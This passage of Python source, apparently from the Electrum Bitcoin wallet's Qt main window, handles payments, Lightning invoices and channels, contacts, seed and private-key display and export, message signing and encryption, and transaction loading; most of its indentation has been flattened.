fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
        # Capture the current top-level window; the override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
                _('Remote peer ID') + ': ' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
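        # The 'd' tag of a BOLT11 invoice carries the description; the for/else falls through
        # to an empty description when the tag is absent.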
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setVisible(b)
self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
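        # URIs carrying an 'r' (payment request URL) or signed BIP70 parameters are resolved
        # asynchronously via on_pr; plain address/amount URIs fill in the send tab directly.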
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
            self.show_error(_('Cannot find payment request in wallet.'))
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
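        # Wrap each command so it runs against this wallet and can prompt for a password via the GUI.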
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
        warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must back up your wallet file every time you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(QLabel(_('Lightning')), 5, 0)
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
            # only show the combobox if multiple master public keys are available
            if len(mpk_list) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
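        # Private keys are derived in a background thread; signals update the dialog, and closing
        # it early sets 'cancelled' so the thread stops.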
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
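        # Enable the Sweep button only when the pasted text parses as private keys and the
        # destination address is valid.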
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
